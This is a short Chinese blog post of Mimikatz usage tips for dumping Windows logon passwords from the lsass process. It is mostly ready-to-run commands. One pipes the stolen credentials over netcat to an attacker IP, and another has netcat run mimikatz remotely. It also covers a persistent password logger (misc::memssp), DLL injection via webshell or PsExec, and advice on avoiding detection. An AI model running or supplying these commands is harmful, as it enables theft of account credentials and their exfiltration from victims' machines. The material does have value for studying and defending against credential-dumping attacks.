zoukankan      html  css  js  c++  java
  • Mimikatz 使用Tips

    1.记录 Mimikatz输出: 
    C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
    2.将输出导入到本地文件: 
    C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
    3.将输出传输到远程机器: 
    Attacker执行: 
    E:>nc -lvp 4444
    Victim执行: 
    C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
    192.168.52.1 为Attacker IP 

    4.通过nc远程执行Mimikatz: 
    Victim执行: 
    C:>nc -lvp 443
    Attacker执行: 
    E:>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
    192.168.52.128 为Victim IP

    若管理员有每过几天就改密码的习惯,但是mimikatz抓取到的密码都是老密码

    用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下

    可以使用以下方法尝试解决

    privilege::debug
    misc::memssp

    记录的结果在c:windowssystem32mimilsa.log
    每次验证都会记录  如 锁屏 等  重启失效

    出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。

    也可以直接logoff,但是这样会很明显。

    文件
    mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)
     
    本机终端
    绝对路径mimikatz.exe
    privilege::debug
    inject::process lsass.exe "绝对路径sekurlsa.dll"
    @getLogonPasswords
    exit
     
     
    webshell
    绝对路径mimikatz.exe < 绝对路径c.txt > 绝对路径userpass.txt
    ----------c.txt----------
    privilege::debug
    inject::process lsass.exe "绝对路径sekurlsa.dll"
    @getLogonPasswords
    exit
    -------------------------
     
     
    远程终端
    psexec.exe -s cmd.exe
    绝对路径mimikatz.exe
    privilege::debug
    inject::process lsass.exe "绝对路径sekurlsa.dll"
    @getLogonPasswords
    exit
  • 相关阅读:
    【WPF学习】第六十二章 构建更复杂的模板
    【WPF学习】第六十一章 组织模板资源
    【WPF学习】第六十章 创建控件模板
    【WPF学习】第五十九章 理解控件模板
    Fast-Rcnn论文翻译
    在pytorch下使用tensorboardX(win10;谷歌浏览器;jupyter notebook)
    win10下cuda安装以及利用anaconda安装pytorch-gpu过程
    JS this的指向
    JS promise对象
    JS 正则表达式
  • 原文地址:https://www.cnblogs.com/hookjoy/p/4822645.html
Copyright © 2011-2022 走看看